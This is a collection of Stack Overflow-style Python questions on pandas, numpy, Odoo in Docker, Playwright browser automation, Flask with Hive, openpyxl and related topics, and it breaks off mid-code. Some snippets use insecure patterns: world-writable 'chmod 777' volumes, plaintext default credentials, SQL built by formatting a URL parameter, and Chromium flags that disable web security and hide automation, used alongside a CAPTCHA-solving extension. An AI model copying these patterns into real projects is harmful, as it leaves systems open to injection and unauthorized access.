<p>In a series or df column, I want to count the number of values that fit within predefined bins (easy) and meaningfully label the bin values (problem).</p>
<pre class="lang-py prettyprint-override"><code>import pandas as pd
data = [{'A': 1, 'B': "Jim"}, {'A': 5, 'B': "Jim"}, {'A': 2, 'B': "Bob"}, {'A': 3, 'B': "Bob"}]
df = pd.DataFrame(data)
mBins = [-1, 2, 4, 6]
mLabels = ["0-2", "3-4", "5-6"]
simple_VC = df["A"].value_counts(bins=mBins)
</code></pre>
<pre class="lang-none prettyprint-override"><code>Out[25]: # ugly bin values
(-1.001, 2.0] 2
(2.0, 4.0] 1
(4.0, 6.0] 1
# Wanted more meaningful bin values:
0-2 2
3-4 1
5-6 1
</code></pre>
<p>I've tried using pd.cut, which allows me to label the bins, but I'm not sure how to use this in a value count. I've also tried to rename, but I don't know how to specify values like (4.0, 6.0], which are neither text or non-text.</p>
<p>How do I label the binned value counts - if possible during the value count, and how to rename bin ranges?</p>
|
<python><pandas>
|
2025-01-17 09:55:56
| 2
| 2,490
|
DrWhat
|
79,364,336
| 2,966,723
|
How to get a python function to work on an np.array or a float, with conditional logic
|
<p>I have a function that I'd like to take numpy arrays or floats as input. I want to keep doing an operation until some measure of error is less than a threshold.</p>
<p>A simple example would be the following to divide a number or array by 2 until it's below a threshold (if a float), or until it's maximum is below a threshold (if an array).</p>
<pre><code>def f(x): #float version
while x>1e-5:
x = x/2
return x
def f(x): #np array version
while max(x)>1e-5:
x = x/2
return x
</code></pre>
<p>Unfortunately, <code>max</code> won't work if I've got something that is not iterable, and <code>x>1e-5</code> won't work if <code>x</code> is an array. I can't find anything to do this, except perhaps <code>vectorize</code>, but that seems to not be as efficient as I would want. How can I get a single function to handle both cases?</p>
|
<python><numpy><overloading>
|
2025-01-17 09:55:17
| 2
| 24,012
|
Joel
|
79,364,331
| 7,677,894
|
Unequal width and height of stride in tf.nn.depthwise_conv2d not supported?
|
<p>Is that right?</p>
<p>IF YES, how can I convert the pretrained weights trained with unequal strides to tensorflow <code>dw-conv</code> with some other <code>ops</code>?</p>
<p>THX</p>
|
<python><tensorflow><deep-learning><tensorflow2.0>
|
2025-01-17 09:52:57
| 0
| 983
|
Ink
|
79,364,302
| 4,979,809
|
How to know in advance what format/columns POST API is expecting?
|
<p>I am trying to send some data to an API.</p>
<p>All information I have is:</p>
<p><strong>ImportUsersFile</strong></p>
<p><strong>Verbs</strong>
POST</p>
<p><strong>Requires authentication</strong>
False</p>
<p><strong>Parameters</strong></p>
<ul>
<li>jobName: string</li>
<li>token: CancellationToken</li>
</ul>
<p>The information is given in their site/api.mvc/</p>
<p>Is there any way of knowing, in advance, what format/columns this is expecting?</p>
<p>I wanted to use <strong>ImportUsersFile</strong> to send some users data to. The API is from the company signinworkspace.</p>
|
<python><post><databricks>
|
2025-01-17 09:43:24
| 0
| 706
|
Chicago1988
|
79,364,092
| 11,505,151
|
Odoo not working - no CSS on login page and blank screen post-login
|
<p>I cloned a project from GitLab that uses Docker to set up multiple services, including Odoo 16, PostgreSQL, a FastAPI backend, and a Next.js frontend.</p>
<p>The project works perfectly on my colleague's machine, but on my setup (macOS), and on another colleague's machine, we are facing the same issue:</p>
<p>The containers start successfully, and I can configure the database connection without any issues. However, when I try to access Odoo at http://localhost:8069/, I encounter the following problem:</p>
<ul>
<li>The login page loads without CSS.</li>
<li>After entering valid credentials, I'am redirected to http://localhost:8069/web, but the page is completely blank.</li>
</ul>
<p>What I Tried:</p>
<p>I attempted several fixes, but none resolved the issue:</p>
<p>1- Regenerating Odoo assets:</p>
<pre><code>docker exec -it odoo bash
odoo --update=all --stop-after-init
docker-compose restart odoo
</code></pre>
<p>2- Checking permissions for mounted volumes:</p>
<pre><code>sudo chmod -R 777 odoo_data
sudo chmod -R 777 odoo_source
sudo chmod -R 777 odoo_custom_addons
</code></pre>
<p>3- Clearing browser cache and trying in incognito mode.
4- Verifying Docker logs for errors (nothing unusual found).</p>
<p>docker-compose.yml (Relevant parts):</p>
<pre><code>services:
postgres_db:
image: postgres:15
container_name: postgres_db
environment:
POSTGRES_USER: postgres
POSTGRES_PASSWORD: password
POSTGRES_DB: xiptelecom
volumes:
- postgres_data:/var/lib/postgresql/data
- ./init_postgres_odoo.sql:/docker-entrypoint-initdb.d/init_postgres_odoo.sql
ports:
- "5432:5432"
pgadmin:
image: dpage/pgadmin4
container_name: pgadmin4_container
restart: always
ports:
- "5050:80"
environment:
PGADMIN_DEFAULT_EMAIL: admin@admin.com
PGADMIN_DEFAULT_PASSWORD: admin
volumes:
- pgadmin_data:/var/lib/pgadmin
backend:
build:
context: ./Backend
container_name: backend
command: uvicorn main:app --host 0.0.0.0 --port 8080 --reload
volumes:
- ./Backend:/app
ports:
- "8080:8080"
depends_on:
- postgres_db
frontend:
build:
context: ./Frontend
container_name: frontend
command: "npm run dev"
volumes:
- ./Frontend:/app
ports:
- "3000:3000"
depends_on:
- backend
odoo:
image: odoo:16
container_name: odoo
depends_on:
- postgres_db
ports:
- "8069:8069"
environment:
HOST: postgres_db
USER: odoo_user # utilisateur postgres sql
PASSWORD: odoo_password # mot de passe postgres sql
DATABASE: odoo # nom de la bdd pour Odoo
MASTER_PASSWORD: admin
volumes:
- odoo_data:/var/lib/odoo
- ./odoo_source:/mnt/odoo_source # monte le dossier local
- ./odoo.conf:/etc/odoo/odoo.conf # Ajout de la configuration locale
- ./odoo_custom_addons:/mnt/extra-addons # répertoire local pour les modules Odoo personnalisés
volumes:
postgres_data:
pgadmin_data:
odoo_data:
</code></pre>
<p>odoo.conf:</p>
<pre><code>[options]
; Infos de connexion à la bdd
db_host = postgres_db
db_port = 5432
db_user = odoo_user
db_password = odoo_password
db_name = odoo
; Configuration des modules
addons_path = /mnt/odoo_source/addons,/mnt/extra-addons
; Autres paramètres
data_dir = /var/lib/odoo
admin_passwd = $pbkdf2-sha512$600000$DAEAQKjV2jsHYKwVIoQwpg$ScuSHwYyRuGfJqbi65UUajG/kN7E5DxptFq1S.hwATMA7o/Mfx7M2dftb4VLDYmR5T1SVgCRaAcd8iHZCJ2QKQ
xmlrpc_port = 8069
longpolling_port = 8072
logfile = /var/log/odoo/odoo.log
</code></pre>
<p>==> Logs & Errors:</p>
<p>No critical errors appear in the logs. The Odoo service starts without issues, and I can even configure the database.</p>
<p>Questions:</p>
<ol>
<li>Why is the login page missing CSS?</li>
<li>Why do I get a blank page after login (http://localhost:8069/web)?</li>
<li>How can I debug and resolve this issue?</li>
</ol>
<p>Any insights or troubleshooting steps would be greatly appreciated!</p>
<p><a href="https://i.sstatic.net/xFoaBf8i.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/xFoaBf8i.png" alt="no CSS on login page" /></a></p>
<p><a href="https://i.sstatic.net/V0FQGn6t.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/V0FQGn6t.png" alt="blank screen post-login" /></a></p>
|
<python><docker><docker-compose><odoo><odoo-16>
|
2025-01-17 08:26:38
| 0
| 1,221
|
AchrafBj
|
79,363,972
| 20,770,190
|
How to load and use an extension within Browser-use?
|
<p>I'm using <a href="https://github.com/browser-use/browser-use" rel="nofollow noreferrer">browser-use</a> for web automation. This package uses playwright under the hood. I realized it is not possible to load an extension in incognito mode, so I must use <code>playwright.chromium.launch_persistent_context</code> instead of <code>playwright.chromium.launch</code>. But <code>browser-use</code> uses <code>playwright.chromium.launch</code>. So I wanted to override the <a href="https://github.com/browser-use/browser-use/blob/main/browser_use/browser/browser.py#L60" rel="nofollow noreferrer">Browser class</a> to change this and load my extension there. However, with the following code I have written so far, it gets stuck and the Chromium instance isn't run like the normal mode:</p>
<pre class="lang-py prettyprint-override"><code>import asyncio
import os
from browser_use import Agent, BrowserConfig, Browser
from browser_use.browser.browser import logger
from langchain_openai import ChatOpenAI
from playwright.async_api import async_playwright, Playwright
extension_path = "/path/to/capsolver-extension"
class CustomBrowser(Browser):
async def _setup_browser(self, playwright: Playwright):
"""Sets up and returns a Playwright Browser instance with persistent context."""
if self.config.wss_url:
browser = await playwright.chromium.connect(self.config.wss_url)
return browser
elif self.config.chrome_instance_path:
import subprocess
import requests
try:
# Check if browser is already running
response = requests.get('http://localhost:9222/json/version', timeout=2)
if response.status_code == 200:
logger.info('Reusing existing Chrome instance')
browser = await playwright.chromium.connect_over_cdp(
endpoint_url='http://localhost:9222',
timeout=20000, # 20 second timeout for connection
)
return browser
except requests.ConnectionError:
logger.debug('No existing Chrome instance found, starting a new one')
# Start a new Chrome instance
subprocess.Popen(
[
self.config.chrome_instance_path,
'--remote-debugging-port=9222',
],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL,
)
# Attempt to connect again after starting a new instance
try:
browser = await playwright.chromium.connect_over_cdp(
endpoint_url='http://localhost:9222',
timeout=20000, # 20 second timeout for connection
)
return browser
except Exception as e:
logger.error(f'Failed to start a new Chrome instance.: {str(e)}')
raise RuntimeError(
' To start chrome in Debug mode, you need to close all existing Chrome instances and try again otherwise we can not connect to the instance.'
)
else:
try:
disable_security_args = []
if self.config.disable_security:
disable_security_args = [
'--disable-web-security',
'--disable-site-isolation-trials',
'--disable-features=IsolateOrigins,site-per-process',
]
# Use launch_persistent_context instead of launch
user_data_dir = os.path.join(os.getcwd(), "user_data") # Specify the path to the user data directory
browser_context = await playwright.chromium.launch_persistent_context(
user_data_dir=user_data_dir,
headless=self.config.headless,
args=[
'--no-sandbox',
'--disable-blink-features=AutomationControlled',
'--disable-infobars',
'--disable-background-timer-throttling',
'--disable-popup-blocking',
'--disable-backgrounding-occluded-windows',
'--disable-renderer-backgrounding',
'--disable-window-activation',
'--disable-focus-on-load',
'--no-first-run',
'--no-default-browser-check',
'--no-startup-window',
'--window-position=0,0',
# f"--disable-extensions-except={extension_path}",
# f'--load-extension={extension_path}', # Load the extension
]
+ disable_security_args
+ self.config.extra_chromium_args,
proxy=self.config.proxy,
)
return browser_context
except Exception as e:
logger.error(f'Failed to initialize Playwright browser: {str(e)}')
raise
config = BrowserConfig(
extra_chromium_args=[
f"--disable-extensions-except={extension_path}",
f"--load-extension={extension_path}",
"--disable-web-security", # Optional, for testing purposes
"--disable-site-isolation-trials"
]
)
browser = CustomBrowser(config=config)
async def main():
# custom_browser = CustomBrowser(config=BrowserConfig())
agent = Agent(
task="Go to Reddit, search for 'browser-use' in the search bar, click on the first post and return the first comment.",
llm=ChatOpenAI(model="gpt-4o"),
browser=browser,
)
result = await agent.run()
print(result)
asyncio.run(main())
</code></pre>
<p>Error which raises after a period of time when it got stuck:</p>
<pre><code>INFO [browser_use] BrowserUse logging setup complete with level info
INFO [root] Anonymized telemetry enabled. See https://github.com/gregpr07/browser-use for more information.
INFO [agent] 🚀 Starting task: Go to google flight and book a flight from New York to Los Angeles
INFO [agent]
📍 Step 1
ERROR [browser] Failed to initialize Playwright browser: BrowserType.launch_persistent_context: Timeout 180000ms exceeded.
Call log:
- <launching> /home/benyamin/.cache/ms-playwright/chromium-1148/chrome-linux/chrome --disable-field-trial-config --disable-background-networking --disable-background-timer-throttling --disable-backgrounding-occluded-windows --disable-back-forward-cache --disable-breakpad --disable-client-side-phishing-detection --disable-component-extensions-with-background-pages --disable-component-update --no-default-browser-check --disable-default-apps --disable-dev-shm-usage --disable-extensions --disable-features=ImprovedCookieControls,LazyFrameLoading,GlobalMediaControls,DestroyProfileOnBrowserClose,MediaRouter,DialMediaRouteProvider,AcceptCHFrame,AutoExpandDetailsElement,CertificateTransparencyComponentUpdater,AvoidUnnecessaryBeforeUnloadCheckSync,Translate,HttpsUpgrades,PaintHolding,ThirdPartyStoragePartitioning,LensOverlay,PlzDedicatedWorker --allow-pre-commit-input --disable-hang-monitor --disable-ipc-flooding-protection --disable-popup-blocking --disable-prompt-on-repost --disable-renderer-backgrounding --force-color-profile=srgb --metrics-recording-only --no-first-run --enable-automation --password-store=basic --use-mock-keychain --no-service-autorun --export-tagged-pdf --disable-search-engine-choice-screen --unsafely-disable-devtools-self-xss-warnings --no-sandbox --no-sandbox --disable-blink-features=AutomationControlled --disable-infobars --disable-background-timer-throttling --disable-popup-blocking --disable-backgrounding-occluded-windows --disable-renderer-backgrounding --disable-window-activation --disable-focus-on-load --no-first-run --no-default-browser-check --no-startup-window --window-position=0,0 --disable-web-security --disable-site-isolation-trials --disable-features=IsolateOrigins,site-per-process --disable-extensions-except=/home/benyamin/PycharmProjects/stack/capsolver-extension --load-extension=/home/benyamin/PycharmProjects/stack/capsolver-extension --disable-web-security --disable-site-isolation-trials --user-data-dir=/home/benyamin/PycharmProjects/stack/user_data --remote-debugging-pipe about:blank
- - <launched> pid=683538
- - [pid=683538][err] [683538:683538:0117/224944.131425:ERROR:service_worker_task_queue.cc(196)] DidStartWorkerFail nbdgbpgkphcgkjiadleadooiojilllaj: 5
- - [pid=683538][err] [683538:683538:0117/224944.167807:ERROR:service_worker_task_queue.cc(196)] DidStartWorkerFail nbdgbpgkphcgkjiadleadooiojilllaj: 5
- - [pid=683538][err] [683538:683549:0117/224947.134480:ERROR:nss_util.cc(345)] After loading Root Certs, loaded==false: NSS error code: -8018
- - [pid=683538][err] [685058:685058:0117/225144.025929:ERROR:gpu_blocklist.cc(71)] Unable to get gpu adapter
WARNING [browser] Page load failed, continuing...
</code></pre>
|
<python><google-chrome-extension><playwright><playwright-python><browser-use>
|
2025-01-17 07:43:54
| 1
| 301
|
Benjamin Geoffrey
|
79,363,898
| 9,648,895
|
How to extract text content under an XML tag using beautifulsoup
|
<p>I have an XML file that looks like this:</p>
<pre><code><sec id="sec2.1">
<title>Study design</title>
<p id="p0055">
This is a secondary analysis of the Childhood Acute Illness and Nutrition (CHAIN) Network prospective cohort which, between November 2016 and January 2019, recruited 3101 children at nine hospitals in Africa and South Asia: Dhaka and Matlab Hospitals (Bangladesh), Banfora Referral Hospital (Burkina Faso), Kilifi County, Mbagathi County and Migori County Hospitals (Kenya), Queen Elizabeth Hospital (Malawi), Civil Hospital (Pakistan), and Mulago National Referral Hospital (Uganda). As described in the published study protocol,
<xref rid="bib11" ref-type="bibr">
<sup>11</sup>
</xref>
children were followed throughout hospital admission and after discharge with follow-up visits at 45, 90 and 180-days post-discharge. Catchment settings differed in urbanisation, access to health care and prevalence of background comorbidities such as HIV and malaria. Prior to study start, sites were audited to optimise care as per national and World Health Organisation (WHO) guidelines.
<xref rid="bib12" ref-type="bibr">
<sup>12</sup>
</xref>
Cross-network harmonisation of clinical definitions and methods was prioritised through staff training and the use of standard operation procedures and case report forms (available online,
<ext-link ext-link-type="uri" xlink:href="https://chainnetwork.org/resources/" id="intref0010">https://chainnetwork.org/resources/</ext-link>
).
</p>
</sec>
</code></pre>
<p>How can I extract the text in the <code><p id="p0055"></code> element using BeautifulSoup?</p>
<p>Approaching this problem with the code below seems not to work.</p>
<pre><code>with open('test.xml', 'r') as file:
soup = BeautifulSoup(file, 'xml')
# Find and print all tags
for tag in soup.find_all('sec'):
print(tag.text)
</code></pre>
|
<python><xml><beautifulsoup><xml-parsing>
|
2025-01-17 07:08:02
| 1
| 306
|
Alex Maina
|
79,363,771
| 12,466,687
|
How to convert 2D networkx graph to interactive 3D in python?
|
<p>I have already built a network 2D graph using <code>networkx</code> in <code>python</code>.</p>
<p><strong>Code</strong> used to build:</p>
<pre><code>import pandas as pd
import matplotlib as mpl
links_data = pd.read_csv("https://raw.githubusercontent.com/johnsnow09/network_graph/refs/heads/main/links_filtered.csv")
G = nx.from_pandas_edgelist(links_data, 'var1', 'var2')
cmap = mpl.colormaps['Set3'].colors # this has 12 colors for 11 categories
cat_colors = dict(zip(links_data['Category'].unique(), cmap))
colors = (links_data
.drop_duplicates('var1').set_index('var1')['Category']
.map(cat_colors)
.reindex(G.nodes)
)
nx.draw(G, with_labels=True, node_color=colors, node_size=200,
edge_color='black', linewidths=.5, font_size=2.5)
</code></pre>
<p>It gives below image as output
<a href="https://i.sstatic.net/4aqC9UuL.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/4aqC9UuL.png" alt="enter image description here" /></a></p>
<p>How can I convert it into <code>3D</code> graph so that I can get better view of Network Relations in the graph ?</p>
<p>Appreciate any help!</p>
|
<python><3d><networkx>
|
2025-01-17 06:00:47
| 1
| 2,357
|
ViSa
|
79,363,724
| 5,093,602
|
Display the hive table results in UI using flask
|
<p>I am new to Flask.
I have a Hive table called <code>database_table</code> with following fields:</p>
<div class="s-table-container"><table class="s-table">
<thead>
<tr>
<th>id</th>
<th>field_id</th>
<th>table_name</th>
<th>schema_name</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>1</td>
<td>employee_table</td>
<td>employee</td>
</tr>
<tr>
<td>2</td>
<td>2</td>
<td>department_table</td>
<td>employeee</td>
</tr>
<tr>
<td>3</td>
<td>3</td>
<td>statistics_table</td>
<td>employeee</td>
</tr>
</tbody>
</table></div>
<p>Based on this <code>database_table</code> when we select <code>field_id</code> based on that we should see the results of following of table in UI using Flask code example. When we select <code>field_id =1</code> then it should pick the table name from <code>database_table</code> and query the <code>employee_Table</code> and display the results in UI.</p>
<p>I have the following code:</p>
<pre class="lang-py prettyprint-override"><code>from pyhive import hive
from flask import current_app
try:
from flask import _app_ctx_stack as stack
except ImportError:
from flask import _request_ctx_stack as stack
class Hive(object):
def __init__(self, app=None):
self.app = app
if app is not None:
self.init_app(app)
def init_app(self, app):
# Use the newstyle teardown_appcontext if it's available,
# otherwise fall back to the request context
if hasattr(app, 'teardown_appcontext'):
app.teardown_appcontext(self.teardown)
else:
app.teardown_request(self.teardown)
def connect(self):
return hive.connect(current_app.config['HIVE_DATABASE_URI'], database="orc")
def teardown(self, exception):
ctx = stack.top
if hasattr(ctx, 'hive_db'):
ctx.hive_db.close()
return None
@property
def connection(self):
ctx = stack.top
if ctx is not None:
if not hasattr(ctx, 'hive_db'):
ctx.hive_db = self.connect()
return ctx.hive_db
@blueprint.route('/hive/<limit>')
def connect_to_hive(limit):
cur = hive.connection.cursor()
query = "select table_name from database_table where field_id=1 {0}".format(limit)
cur.execute(query)
res = cur.fetchall()
return jsonify(data=res)
</code></pre>
|
<python><sql><flask><flask-sqlalchemy>
|
2025-01-17 05:33:39
| 0
| 5,901
|
Chanukya
|
79,363,512
| 10,732,351
|
Why do my row-major vs. column-major and iteration vs. index-based array access tests produce unexpected results?
|
<p>I'm reading the book <em>Designing Machine Learning Systems by Chip Huyen</em> (<a href="https://rads.stackoverflow.com/amzn/click/com/1098107969" rel="nofollow noreferrer" rel="nofollow noreferrer">Amazon Link</a>). In Chapter 3, section <em>Row-Major Versus Column-Major Format</em>, the book explains that for row-major arrays, accessing data by rows should be faster than by columns, and vice versa for column-major arrays.</p>
<p>However, when I wrote some test cases, the results surprised me. I have two questions:</p>
<ol>
<li><p>My results show that the array's major order does not seem to affect the access speed, which is unexpected. Why is this happening?</p>
</li>
<li><p>I tested two methods to access the array: index-based access and iteration. I expected them to have the same performance since both have the same complexity. However, my results show that the iteration method outperforms index-based access. Why is this the case?</p>
</li>
</ol>
<p>Here’s the code I used for testing:</p>
<pre class="lang-py prettyprint-override"><code>from time import perf_counter
import numpy as np
def test_column_access_numpy_index(array):
n_row, n_col = array.shape
start = perf_counter()
for j in range(n_col):
for i in range(n_row):
_ = array[i, j]
return perf_counter() - start
def test_row_access_numpy_index(array):
n_row, n_col = array.shape
start = perf_counter()
for i in range(n_row):
for j in range(n_col):
_ = array[i, j]
return perf_counter() - start
def test_column_access_numpy_iteration(array):
n_row, n_col = array.shape
start = perf_counter()
for j in range(n_col):
for item in array[:, j]:
pass
return perf_counter() - start
def test_row_access_numpy_iteration(array):
n_row, n_col = array.shape
start = perf_counter()
for i in range(n_row):
for item in array[i]:
pass
return perf_counter() - start
if __name__=='__main__':
size = 10_000
row_major = np.ones((size, size), dtype=np.float32, order='C')
col_major = np.ones((size, size), dtype=np.float32, order='F')
print("Warm up")
test_row_access_numpy_iteration(row_major)
print("Input row major")
time = test_row_access_numpy_index(row_major)
print(f"Testing row access index in numpy: {time:.6f} seconds")
time = test_column_access_numpy_index(row_major)
print(f"Testing column access index in numpy: {time:.6f} seconds")
time = test_row_access_numpy_iteration(row_major)
print(f"Testing row access iteration in numpy: {time:.6f} seconds")
time = test_column_access_numpy_iteration(row_major)
print(f"Testing column access iteration in numpy: {time:.6f} seconds")
print('----------------------------')
print("Input col major")
time = test_row_access_numpy_index(col_major)
print(f"Testing row access index in numpy: {time:.6f} seconds")
time = test_column_access_numpy_index(col_major)
print(f"Testing column access index in numpy: {time:.6f} seconds")
time = test_row_access_numpy_iteration(col_major)
print(f"Testing row access iteration in numpy: {time:.6f} seconds")
time = test_column_access_numpy_iteration(col_major)
print(f"Testing column access iteration in numpy: {time:.6f} seconds")
</code></pre>
<p>Here is the output result</p>
<pre><code>Warm up
Input row major
Testing row access index in numpy: 7.732731 seconds
Testing column access index in numpy: 8.025850 seconds
Testing row access iteration in numpy: 3.111501 seconds
Testing column access iteration in numpy: 3.129321 seconds
----------------------------
Input col major
Testing row access index in numpy: 7.852834 seconds
Testing column access index in numpy: 7.978318 seconds
Testing row access iteration in numpy: 3.027528 seconds
Testing column access iteration in numpy: 3.075494 seconds
</code></pre>
|
<python><arrays><numpy>
|
2025-01-17 02:56:44
| 2
| 1,306
|
CuCaRot
|
79,363,433
| 2,635,863
|
convert multi-index column to single column in dataframe
|
<pre><code>import pandas as pd
columns = pd.MultiIndex.from_tuples(
[('A', 'one'), ('A', 'two'), ('B', 'one'), ('B', 'two'), ('C', '')],
names=[None, 'number'])
df = pd.DataFrame([[1, 2, 3, 4, 'X'], [5, 6, 7, 8, 'Y']], columns=columns)
A B C
number one two one two
0 1 2 3 4 X
1 5 6 7 8 Y
</code></pre>
<p>I'd like to remove the multi-index by making <code>number</code> a column:</p>
<pre><code>A B C number
1 3 X one
5 7 Y one
2 4 X two
6 8 Y two
</code></pre>
<p>I tried extracting the values with <code>df[[('number', ('A','one')]]</code> so that I can assign them to individual columns, but it doesn't work.</p>
|
<python><pandas>
|
2025-01-17 01:38:51
| 1
| 10,765
|
HappyPy
|
79,363,424
| 5,128,398
|
Why a long line printed by python in gitbash or cygwin become broken (multiple) lines when being copy and pasted?
|
<p>I have a python program that prints some examples so that users can copy and paste to run. The examples are all long lines.</p>
<p>I noticed that when python printed a long line in gitbash, and then I copy and paste it to gitbash, the long line becomes multiple short lines.</p>
<p>The following is a test python script, test_long_line.py</p>
<pre><code>#!/usr/bin/env python
line = "echo cmd"
for i in range(0, 30):
line = f"{line} arg{i} "
print(line)
</code></pre>
<p>When I run it,</p>
<pre><code>$ test_long_line.py
echo cmd arg0 arg1 arg2 arg3 arg4 arg5 arg6 arg7 arg8 arg9 arg10 arg11 arg12 arg13 arg14 arg15 arg16 arg17 arg18 arg19 arg20 arg21 arg22 arg23 arg24 arg25 arg26 arg27 arg28
arg29
</code></pre>
<p>The printout looks like 1 line, wrapped around, but when I copy and paste to the same gitbash, gitbash sees it as broken lines</p>
<pre><code>$ echo cmd arg0 arg1 arg2 arg3 arg4 arg5 arg6 arg7 arg8 arg9 arg10 arg11 arg12 arg13 arg
14 arg15 arg16 arg17 arg18 arg19 arg20 arg21 arg22 arg23 arg24 arg25 arg26 arg27 arg28
arg29
cmd arg0 arg1 arg2 arg3 arg4 arg5 arg6 arg7 arg8 arg9 arg10 arg11 arg12 arg13 arg
bash: 14: command not found
bash: arg29: command not found
</code></pre>
<p>I did more experiments, and concluded:</p>
<ul>
<li>The same problem happens when python prints in Cygwin.</li>
<li>However, windows Batch (cmd.exe) doesn't have this problem.</li>
<li>Perl's print doesn't have this problem. (see perl test script below)</li>
<li>Bash's echo doesn't have this problem. (see bash test script below)</li>
<li>Linux (WSL2) terminal doesn't have this problem.</li>
</ul>
<p>My test environment:</p>
<ul>
<li>Windows 10 with latest patch</li>
<li>Python 3.12.4</li>
<li>Gitbash Mintty 3.7.1</li>
<li>Cygwin Mintty 3.7.4</li>
</ul>
<p>Perl test script, print_long_line.pl, which doesn't have the problem</p>
<pre><code>#!/usr/bin/env perl
use strict;
my $line = "echo cmd ";
for (my $i = 0; $i < 30; $i++) {
$line .= "arg$i ";
}
</code></pre>
<p>Bash test script, test_long_line.bash, which doesn't have the problem</p>
<pre><code>#!/bin/bash
line="echo cmd"
for i in {0..29}; do
line+=" arg$i"
done
echo "$line"
</code></pre>
<p>I've been using Python for years. This is only now that I noticed this. Not sure why Python does this.</p>
<p>Any insight is appreciated.</p>
|
<python><cygwin><git-bash>
|
2025-01-17 01:24:19
| 0
| 1,063
|
oldpride
|
79,363,421
| 4,080,181
|
How to simplify a linear system of equations by eliminating intermediate variables
|
<p>I have a linear system shown in the block diagram below.</p>
<p><a href="https://i.sstatic.net/TMyhhczJ.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/TMyhhczJ.png" alt="enter image description here" /></a></p>
<p>This system is described with the following set of linear equations:</p>
<pre><code>err = inp - fb
out = a * err
fb = f * out
</code></pre>
<p>I would like to use sympy to compute the output (<em>out</em>) of the function of the input (<em>inp</em>). Thus, I would like to eliminate the variables <em>err</em> and <em>fb</em>. I would like some help as I been unable to figure out how to express what I want. So far I have:</p>
<pre class="lang-py prettyprint-override"><code>from sympy import symbols, Eq, solve
inp, err, out, fb, a, f = symbols("inp err out fb a f")
eqns = [
Eq(err, inp - fb),
Eq(out, a * err),
Eq(fb, f * out),
]
solution = solve(eqns, [out])
solution
# []
</code></pre>
<p>That clearly does not work.</p>
<p>I thought perhaps <code>simplify()</code> might help here, but I don't know how to apply the simplify function to a system of equations.</p>
<p>The result I am hoping to achieve is:</p>
<pre><code> a
out = ------ * inp
1 + af
</code></pre>
<p>Can anyone point me in the right direction?</p>
|
<python><math><sympy>
|
2025-01-17 01:19:41
| 2
| 548
|
August West
|
79,363,420
| 825,227
|
Running into an error using Pandas `read_html`: "ValueError: invalid literal for int() with base 10: '40%'"
|
<p>Have successfully used <code>pd.read_html</code> for a majority of webpages I'm scanning but the below throws the error referenced:</p>
<p>'https://sec.gov/Archives/edgar/data/320193/000032019323000048/xslF345X04/wf-form4_168064750462974.xml'</p>
<p>When I inspect the webpage source, I can see the offending <code>rowspan</code> assignment:</p>
<pre><code></table>
</td>
</tr>
<tr><td valign="top" rowspan="40%" colspan="50%"><span class="MedSmallFormText"><table width="100%" border="0" cellpadding="0" cellspacing="0"><tr><td>
Rule 10b5-1(c) Transaction Indication
</td></tr></table>
</code></pre>
<p>The webpage resolves correctly so clearly not an error, what's the remedy here?</p>
<p>Here is the code I'm using to parse this file and error being thrown:</p>
<pre><code>headers = {
"User-Agent": "Alias (alias118@gmail.com)",
"Accept-Encoding": "gzip, deflate"
"Host": "www.sec.gov"
}
filing_url = 'https://data.sec.gov/Archives/edgar/data/320193/000032019323000048/xslF345X04/wf-form4_168064750462974.xml'
x = requests.get(filing_url, headers=headers)
if x.status_code != 200:
print(f'Error loading xml for file:\n{filing_url}\nReason: {x.reason}')
else:
print(filing_url,'\n')
columns = [
'title',
'trade_date',
'execution_date',
'trade_code',
'trade_code_v',
'shares_traded',
'acq_code',
'price',
'shares_remaining',
'own_type',
'relationship'
]
try:
tbls = pd.read_html(x.content)
except:
pass
</code></pre>
<p>To contrast, the below file reads without issue:
'https://data.sec.gov/Archives/edgar/data/320193/000032019323000016/xslF345X03/wf-form4_167546711444862.xml'</p>
<p>**data.sec.gov and sec.gov domains are used for API and web-based access, respectively, separately</p>
|
<python><html><pandas>
|
2025-01-17 01:17:06
| 0
| 1,702
|
Chris
|
79,363,386
| 8,812,734
|
Is there a way of differentiating collapsed column in excel sheet via python
|
<p>I am reading excel sheet via python and trying to read only visible rows in python (not hidden or collapsed). I went through documentation of <a href="https://openpyxl.readthedocs.io/en/stable/api/openpyxl.worksheet.dimensions.html" rel="nofollow noreferrer">OPENPYXL</a> and found that it has "hidden" and "collapsed" property. But once I read the excel sheet not always "hidden" or "collapsed" is true when column is hidden. My code is following</p>
<pre><code>def read_visible_data_from_sheet(sheet):
data = []
# Iterate through rows
for row in sheet.iter_rows():
row_num = row[0].row
# Check if the row is hidden or has height set to 0
row_hidden = sheet.row_dimensions[row_num].hidden
row_height = sheet.row_dimensions[row_num].height
row_level = sheet.row_dimensions[row_num].outlineLevel
if row_hidden or (row_height is not None and row_height == 0):
continue # Skip hidden rows
# Check if any parent row is collapsed
is_collapsed = False
for parent_row_num in range(1, row_num):
if sheet.row_dimensions[parent_row_num].outlineLevel < row_level and sheet.row_dimensions[parent_row_num].hidden == True:
is_collapsed = True
break
if is_collapsed:
continue # Skip collapsed rows
visible_row = []
# Iterate through columns in the row
for cell in row:
col_letter = cell.column_letter
col_dim = sheet.column_dimensions.get(col_letter)
if col_dim:
col_hidden = col_dim.hidden
col_width = col_dim.width
else:
continue
# Check if the column is hidden or has width set to 0
if col_hidden or (col_width is not None and col_width == 0):
continue # Skip hidden columns
visible_row.append(cell.value)
# Append the visible row to the data list
if visible_row: # Avoid adding empty rows
data.append(visible_row)
# Convert to a DataFrame
df = pd.DataFrame(data)
return df, sheet
</code></pre>
<p>In some cases the sheet.column_dimensions contains columns which are visible while in other cases it doesn't contain columns in sheet.column_dimensions even if it is visible.</p>
<p>Is there a better way to deal with such cases? I am open on exploring any other library if necessary.</p>
|
<python><openpyxl><xlsx><xls><xlsm>
|
2025-01-17 00:41:40
| 1
| 317
|
Aaroosh Pandoh
|
79,363,266
| 2,846,766
|
How can I write zeros to a 2D numpy array by both row and column indices
|
<p>I have a large (90k x 90k) numpy ndarray and I need to zero out a block of it. I have a list of about 30k indices that indicate which rows <em>and</em> columns need to be zero. The indices aren't necessarily contiguous, so <code>a[min:max, min:max]</code> style slicing isn't possible.</p>
<p>As a toy example, I can start with a 2D array of non-zero values, but I can't seem to write zeros the way I expect.</p>
<pre class="lang-py prettyprint-override"><code>import numpy as np
